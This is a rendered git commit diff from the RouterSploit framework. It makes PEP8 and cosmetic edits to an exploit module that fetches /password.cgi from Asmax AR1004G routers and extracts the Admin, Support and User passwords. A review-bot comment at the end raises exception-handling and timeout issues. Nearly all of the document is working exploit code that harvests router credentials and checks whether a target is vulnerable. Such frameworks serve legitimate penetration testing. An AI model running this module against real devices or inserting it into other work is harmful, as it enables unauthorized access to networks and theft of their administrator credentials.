Commit
d4fb4d39
authored
9 years ago
by
fwkz
Cosmetics and PEP8 fixes
parent
22327774
Showing
1 changed file
with
26 additions
and
28 deletions
+26
-28
ar_1004g_password_disclosure.py
...it/modules/exploits/asmax/ar_1004g_password_disclosure.py
+26
-28
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
...
...
@@ -18,52 +18,51 @@ class Exploit(exploits.Exploit):
"""
__info__
=
{
'name'
:
'Asmax AR1004G Password Disclosure'
,
'description'
:
'Exploits asmax password disclosure vulnerability that allows to fetch credentials for: Admin, Support and User accounts.'
,
'description'
:
'Exploits asmax password disclosure vulnerability that allows to '
'fetch credentials for: Admin, Support and User accounts.'
,
'authors'
:
[
'Marcin Bury <marcin.bury@reverse-shell.com>'
,
# routersploit module
],
'Marcin Bury <marcin.bury@reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt'
],
'targets'
:
[
'Asmax AR 1004g'
]
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt'
,
],
'targets'
:
[
'Asmax AR 1004g'
,
]
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
def
run
(
self
):
creds
=
[]
url
=
sanitize_url
(
"{}:{}/password.cgi"
.
format
(
self
.
target
,
self
.
port
))
print_status
(
"Requesting for {}"
.
format
(
url
))
try
:
r
=
requests
.
get
(
url
)
res
=
r
.
text
response
=
requests
.
get
(
url
)
.
text
except
(
requests
.
exceptions
.
MissingSchema
,
requests
.
exceptions
.
InvalidSchema
):
print_error
(
"Invalid URL format:
%
s"
%
url
)
print_error
(
"Invalid URL format:
{}"
.
format
(
url
)
)
return
except
requests
.
exceptions
.
ConnectionError
:
print_error
(
"Connection error:
%
s"
%
url
)
print_error
(
"Connection error:
{}"
.
format
(
url
)
)
return
creds
=
[]
admin
=
re
.
findall
(
"pwdAdmin = '(.+?)'"
,
res
)
if
len
(
admin
):
admin
=
re
.
findall
(
"pwdAdmin = '(.+?)'"
,
response
)
if
admin
:
creds
.
append
((
'Admin'
,
admin
[
0
]))
support
=
re
.
findall
(
"pwdSupport = '(.+?)'"
,
res
)
if
len
(
support
)
:
support
=
re
.
findall
(
"pwdSupport = '(.+?)'"
,
res
ponse
)
if
support
:
creds
.
append
((
'Support'
,
support
[
0
]))
user
=
re
.
findall
(
"pwdUser = '(.+?)'"
,
res
)
if
len
(
user
)
:
user
=
re
.
findall
(
"pwdUser = '(.+?)'"
,
res
ponse
)
if
user
:
creds
.
append
((
'User'
,
user
[
0
]))
if
len
(
creds
)
:
if
creds
:
print_success
(
"Credentials found!"
)
headers
=
(
"Login"
,
"Password"
)
print_table
(
headers
,
*
creds
)
print_table
((
"Login"
,
"Password"
),
*
creds
)
else
:
print_error
(
"Credentials could not be found"
)
...
...
@@ -71,12 +70,11 @@ class Exploit(exploits.Exploit):
url
=
sanitize_url
(
"{}:{}/password.cgi"
.
format
(
self
.
target
,
self
.
port
))
try
:
r
=
requests
.
get
(
url
)
res
=
r
.
text
response
=
requests
.
get
(
url
)
.
text
except
:
return
None
# could not be verified
if
any
(
map
(
lambda
x
:
x
in
res
,
[
"pwdSupport"
,
"pwdUser"
,
"pwdAdmin"
])):
return
True
# target vulnerable
if
any
(
map
(
lambda
x
:
x
in
res
ponse
,
[
"pwdSupport"
,
"pwdUser"
,
"pwdAdmin"
])):
return
True
# target vulnerable
return
False
# target not vulnerable
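Review bot: The bare `except:` in the second hunk, right after `response = requests.get(url).text`, survives this PEP8 cleanup. It also catches `KeyboardInterrupt` and `SystemExit`, and reports any programming error as "could not be verified". Narrowing it to `except requests.exceptions.RequestException:` would still cover the schema and connection errors that `run` handles one by one in the first hunk. Both `requests.get(url)` calls also omit `timeout=`, so a host that accepts the connection and never answers blocks the call indefinitely, and `run` would not catch the resulting `requests.exceptions.Timeout` once a timeout is added. The method containing the second hunk starts outside the visible lines, so its name and any earlier handling cannot be confirmed from here.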